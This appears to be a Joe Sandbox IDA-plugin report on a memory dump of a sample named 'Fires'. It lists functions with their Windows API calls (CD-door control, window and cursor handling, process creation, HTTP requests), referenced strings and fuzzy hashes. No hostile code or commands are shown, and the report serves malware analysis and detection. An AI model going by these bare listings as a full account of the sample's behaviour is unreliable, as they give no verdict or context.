Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: e306fa8d0d9c780152ece0564cffacf5a6235c6a8775462335136e1f8ca5ad8a
Instruction ID: cf66b9f2c21be81906821cb5cb4fa85b206ccbbaef20746d0d8463dde6a8f411
Opcode Fuzzy Hash: e306fa8d0d9c780152ece0564cffacf5a6235c6a8775462335136e1f8ca5ad8a
Instruction Fuzzy Hash: F761CC71900219BBEB159F74CC41BBE77A9EF08B20F108606F815E62D1DB75AA90DBB0

Function 00DB48BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00DB493D
_wcslen.LIBCMT ref: 00DB4948
_wcslen.LIBCMT ref: 00DB499F
_wcslen.LIBCMT ref: 00DB49DD
GetDriveTypeW.KERNEL32(?), ref: 00DB4A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DB4A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DB4A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DB4ACC

Strings

type cdaudio alias cd wait, xrefs: 00DB4A46
wait, xrefs: 00DB4A89
closed, xrefs: 00DB494D, 00DB4972, 00DB498B, 00DB49C3, 00DB49DC
open , xrefs: 00DB4A2A
set cd door , xrefs: 00DB4A6D
close cd wait, xrefs: 00DB4AB7
open, xrefs: 00DB4999, 00DB499E
close, xrefs: 00DB4943, 00DB495D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 1977afb9879cd4555e155a46811b502cdab948afda80a0c5b32844f1de3a54a2
Instruction ID: 6afdd3437a39d7f99156b7963a8e1e1d71cb21854b525251428b295e36ff5526
Opcode Fuzzy Hash: 1977afb9879cd4555e155a46811b502cdab948afda80a0c5b32844f1de3a54a2
Instruction Fuzzy Hash: 4771B4729083119FC710EF24C8819ABB7E4EF98758F14492DF89697292EB31ED45CBB1

Function 00DA6382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00DA6395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00DA63A7
SetWindowTextW.USER32(?,?), ref: 00DA63BE
GetDlgItem.USER32(?,000003EA), ref: 00DA63D3
SetWindowTextW.USER32(00000000,?), ref: 00DA63D9
GetDlgItem.USER32(?,000003E9), ref: 00DA63E9
SetWindowTextW.USER32(00000000,?), ref: 00DA63EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00DA6410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00DA642A
GetWindowRect.USER32(?,?), ref: 00DA6433
_wcslen.LIBCMT ref: 00DA649A
SetWindowTextW.USER32(?,?), ref: 00DA64D6
GetDesktopWindow.USER32 ref: 00DA64DC
GetWindowRect.USER32(00000000), ref: 00DA64E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00DA653A
GetClientRect.USER32(?,?), ref: 00DA6547
PostMessageW.USER32(?,00000005,00000000,?), ref: 00DA656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00DA6596

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: f7044c99c4f97723f0f6b3beeac7a91c7e2617f2b4d713737d6b7efec579b5e7
Instruction ID: bed6341f1a8d4526fbf1a5d40fb27c7965ca106aa8f301354769e43b4376568d
Opcode Fuzzy Hash: f7044c99c4f97723f0f6b3beeac7a91c7e2617f2b4d713737d6b7efec579b5e7
Instruction Fuzzy Hash: E3718C31900709EFDB20DFA8CE45AAEBBF5FF48704F184919E586E26A0D775E944CB60

Function 00DC086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00DC0884
LoadCursorW.USER32(00000000,00007F8A), ref: 00DC088F
LoadCursorW.USER32(00000000,00007F00), ref: 00DC089A
LoadCursorW.USER32(00000000,00007F03), ref: 00DC08A5
LoadCursorW.USER32(00000000,00007F8B), ref: 00DC08B0
LoadCursorW.USER32(00000000,00007F01), ref: 00DC08BB
LoadCursorW.USER32(00000000,00007F81), ref: 00DC08C6
LoadCursorW.USER32(00000000,00007F88), ref: 00DC08D1
LoadCursorW.USER32(00000000,00007F80), ref: 00DC08DC
LoadCursorW.USER32(00000000,00007F86), ref: 00DC08E7
LoadCursorW.USER32(00000000,00007F83), ref: 00DC08F2
LoadCursorW.USER32(00000000,00007F85), ref: 00DC08FD
LoadCursorW.USER32(00000000,00007F82), ref: 00DC0908
LoadCursorW.USER32(00000000,00007F84), ref: 00DC0913
LoadCursorW.USER32(00000000,00007F04), ref: 00DC091E
LoadCursorW.USER32(00000000,00007F02), ref: 00DC0929
GetCursorInfo.USER32(?), ref: 00DC0939
GetLastError.KERNEL32 ref: 00DC097B

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 67ce19fa8719843eb99b602d924cc9bbb291142bf4217a871f997e8bff82a652
Instruction ID: 6ae27bab8d53d3bd7a670652c528934bf3ffd95e66a3baf4b7f3d93d485cfba4
Opcode Fuzzy Hash: 67ce19fa8719843eb99b602d924cc9bbb291142bf4217a871f997e8bff82a652
Instruction Fuzzy Hash: C4415470D0831AABDB109FBA8C85D5EBFE8FF04754B54452AE11DE7291DA78D801CFA1

Function 00DA3A43 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DA3AD9
_wcslen.LIBCMT ref: 00DA3B44

Strings

k, xrefs: 00DA3CE6
TEXT, xrefs: 00DA3DC8
REGEXPCLASS, xrefs: 00DA3BA1, 00DA3BB2
NAME, xrefs: 00DA3C81, 00DA3C92
CLASSNN, xrefs: 00DA3B3F, 00DA3B50
INSTANCE, xrefs: 00DA3D9F
CLASS, xrefs: 00DA3AD4, 00DA3AF1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k
API String ID: 176396367-2171760788
Opcode ID: 93b1603d48b7bfaced8ebef765635c4db93880896af64e09ffb21c1e18e6cb8f
Instruction ID: 87a7960441da262c5dc21437136ace6a99cf5fdf85338de4a7516aaad457b5aa
Opcode Fuzzy Hash: 93b1603d48b7bfaced8ebef765635c4db93880896af64e09ffb21c1e18e6cb8f
Instruction Fuzzy Hash: 44E19332A005169BCF189FA8C8417EDBBB6FF55710F14422AF456F7290DB309E9997B0

Function 00D60436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00D60436

Part of subcall function 00D6045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00E1170C,00000FA0,CB0EFF3D,?,?,?,?,00D82733,000000FF), ref: 00D6048C
Part of subcall function 00D6045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00D82733,000000FF), ref: 00D60497
Part of subcall function 00D6045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00D82733,000000FF), ref: 00D604A8
Part of subcall function 00D6045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00D604BE
Part of subcall function 00D6045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00D604CC
Part of subcall function 00D6045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00D604DA
Part of subcall function 00D6045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D60505
Part of subcall function 00D6045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00D60510

___scrt_fastfail.LIBCMT ref: 00D60457

Part of subcall function 00D60413: __onexit.LIBCMT ref: 00D60419

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00D60492
SleepConditionVariableCS, xrefs: 00D604C4
WakeAllConditionVariable, xrefs: 00D604D2
InitializeConditionVariable, xrefs: 00D604B8
kernel32.dll, xrefs: 00D604A3

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: fd9677020134a141343b00b05c9ed3a96833d068c13be424e99bcfb70aef91ee
Instruction ID: 9fbf07ee632891533f88f0fba557bdb0dcb1a53047bd4a16838c550310e4e2ac
Opcode Fuzzy Hash: fd9677020134a141343b00b05c9ed3a96833d068c13be424e99bcfb70aef91ee
Instruction Fuzzy Hash: BE210B326457056FD7212BA5AC06B6B3F95DB05B61F040166FA01E37C0DFB09C458A71

Function 00DB4F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,00DDDCD0), ref: 00DB4F6C
_wcslen.LIBCMT ref: 00DB4F80
_wcslen.LIBCMT ref: 00DB4FDE
_wcslen.LIBCMT ref: 00DB5039
_wcslen.LIBCMT ref: 00DB5084
_wcslen.LIBCMT ref: 00DB50EC

Part of subcall function 00D5FD52: _wcslen.LIBCMT ref: 00D5FD5D

GetDriveTypeW.KERNEL32(?,00E07C10,00000061), ref: 00DB5188

Strings

all, xrefs: 00DB4F76, 00DB4F7B
removable, xrefs: 00DB502F, 00DB5034
network, xrefs: 00DB50E2, 00DB50E7
unknown, xrefs: 00DB514D
fixed, xrefs: 00DB507A, 00DB507F
ramdisk, xrefs: 00DB5136
cdrom, xrefs: 00DB4FD4, 00DB4FD9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 5d959d59d1280f80566eb56331eaf4481a3099f026da9cb8700dd00a61d5dd43
Instruction ID: e46c0961fefa37a589e4ad128196f7547d97620c1231485a5f59c1a5db73b36e
Opcode Fuzzy Hash: 5d959d59d1280f80566eb56331eaf4481a3099f026da9cb8700dd00a61d5dd43
Instruction Fuzzy Hash: A3B1D131608702DFC710EF29D891BAAB7E5EFA4760F14491DF4978729AD730D884CAB2

Function 00DCBA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DCBBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DCBC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DCBC34
_wcslen.LIBCMT ref: 00DCBC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DCBC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DCBC96
_wcslen.LIBCMT ref: 00DCBD92

Part of subcall function 00DB0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00DB0F6D

_wcslen.LIBCMT ref: 00DCBDAB
_wcslen.LIBCMT ref: 00DCBDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DCBE16
GetLastError.KERNEL32(00000000), ref: 00DCBE67
CloseHandle.KERNEL32(?), ref: 00DCBE99
CloseHandle.KERNEL32(00000000), ref: 00DCBEAA
CloseHandle.KERNEL32(00000000), ref: 00DCBEBC
CloseHandle.KERNEL32(00000000), ref: 00DCBECE
CloseHandle.KERNEL32(?), ref: 00DCBF43

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 6d4665d8fe16a8fe5ed6cf626884a7d93b6674400ef2c80699a60854195a9258
Instruction ID: 7596b25e6b2f077e3f878cc892f566593bea4b7d0709a90e33c942cd330f96ef
Opcode Fuzzy Hash: 6d4665d8fe16a8fe5ed6cf626884a7d93b6674400ef2c80699a60854195a9258
Instruction Fuzzy Hash: DAF17D715043419FCB14EF24C892B6ABBE5EF85320F18855EF4968B2A2DB71DC45CB72

Function 00DC4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00DDDCD0), ref: 00DC4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00DC4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00DDDCD0), ref: 00DC4B4F
FreeLibrary.KERNEL32(00000000,?,00DDDCD0), ref: 00DC4B9B
StringFromGUID2.OLE32(?,?,00000028,?,00DDDCD0), ref: 00DC4C05
SysFreeString.OLEAUT32(00000009), ref: 00DC4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00DC4D25
SysFreeString.OLEAUT32(?), ref: 00DC4D4F

Strings

kernel32.dll, xrefs: 00DC4B13
GetModuleHandleExW, xrefs: 00DC4B24

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: e1ca66ca59ec7c30ea5093a4adfc757eb86ebcb6892813022a833e916910d6d6
Instruction ID: 039520a0b3fafd74c8dbd6b07c1359e5308e71f3dea4b5f720e3b08c3f4b8ac4
Opcode Fuzzy Hash: e1ca66ca59ec7c30ea5093a4adfc757eb86ebcb6892813022a833e916910d6d6
Instruction Fuzzy Hash: 65122B71A00216EFDB14DF94C894EAABBB9FF45314F18809CF9459B251D731ED46CBA0

Function 00D4381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00E129C0), ref: 00D83F72
GetMenuItemCount.USER32(00E129C0), ref: 00D84022
GetCursorPos.USER32(?), ref: 00D84066
SetForegroundWindow.USER32(00000000), ref: 00D8406F
TrackPopupMenuEx.USER32(00E129C0,00000000,?,00000000,00000000,00000000), ref: 00D84082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D8408E

Strings

0, xrefs: 00D4382D

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: ed7c282895d97d117134c6842030c1fe2306173083c7a3ce7b83f3279fdf1290
Instruction ID: ede14aca475d4dc9835d25d88218ed36c1b52e40d1c5e1929e63fe7ff71aa0f0
Opcode Fuzzy Hash: ed7c282895d97d117134c6842030c1fe2306173083c7a3ce7b83f3279fdf1290
Instruction Fuzzy Hash: 7871D730A44305BFEB21AF69DC49FAABF69FF05764F180216F618A61E0C7719910DBB0

Function 00DD7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 00DD7823

Part of subcall function 00D48577: _wcslen.LIBCMT ref: 00D4858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DD7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DD78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DD78CC
DestroyWindow.USER32(?), ref: 00DD78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D40000,00000000), ref: 00DD791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DD7935
GetDesktopWindow.USER32 ref: 00DD794E
GetWindowRect.USER32(00000000), ref: 00DD7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DD796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DD7985

Part of subcall function 00D42234: GetWindowLongW.USER32(?,000000EB), ref: 00D42242

Strings

0, xrefs: 00DD77D0
tooltips_class32, xrefs: 00DD7890, 00DD7915

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: f75adb9f4d31141117ec7e8e3a5a7b2e34b59b76b28f4c14bd11a0f1544c39e2
Instruction ID: ba96acdec674635c39dea4cca8e39e91936b909246abd6866d563b981e7875e4
Opcode Fuzzy Hash: f75adb9f4d31141117ec7e8e3a5a7b2e34b59b76b28f4c14bd11a0f1544c39e2
Instruction Fuzzy Hash: 90716671508344AFDB25CF28CC48BAABBE9EB89304F08459FF98597361D770E906DB21

Function 00D4146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00D41802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00D41488,?,00000000,?,?,?,?,00D4145A,00000000,?), ref: 00D41865

DestroyWindow.USER32(?), ref: 00D41521
KillTimer.USER32(00000000,?,?,?,?,00D4145A,00000000,?), ref: 00D415BB
DestroyAcceleratorTable.USER32(00000000), ref: 00D829B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00D4145A,00000000,?), ref: 00D829E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00D4145A,00000000,?), ref: 00D829F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00D4145A,00000000), ref: 00D82A15
DeleteObject.GDI32(00000000), ref: 00D82A27

Strings

<), xrefs: 00D415E0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID: <)
API String ID: 641708696-200976629
Opcode ID: 1b6e02c088efd4e56468466b8a7bd0a4456deda2ed78b602e789d736515dfceb
Instruction ID: 3a10cf35938a59bb88c25281e5753b5db8da91e9c9455d0e0a53bddb067d20b5
Opcode Fuzzy Hash: 1b6e02c088efd4e56468466b8a7bd0a4456deda2ed78b602e789d736515dfceb
Instruction Fuzzy Hash: 5A616735501751DFDB39AF19DD48B7A77B2FF80322F188119E186AAA60C770E894CFA4

Function 00DBCEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DBCEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DBCF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DBCF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DBCF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DBCF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DBCF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DBCF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DBCFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DBD021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DBD035
InternetCloseHandle.WININET(00000000), ref: 00DBD040

Strings

, xrefs: 00DBCFBA

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 52c1a2d578e381664d773c9ba864daa710314e23a7b4bd361dd23297e39e6708
Instruction ID: ac2e233eb1a24512958bda1278df2aa830862bd4330fbd39a1aca051891885a9
Opcode Fuzzy Hash: 52c1a2d578e381664d773c9ba864daa710314e23a7b4bd361dd23297e39e6708
Instruction Fuzzy Hash: 085135B1501708FFEB219F61CC88AAA7BBEFF08754F04841AF946D6250E734D945ABB0

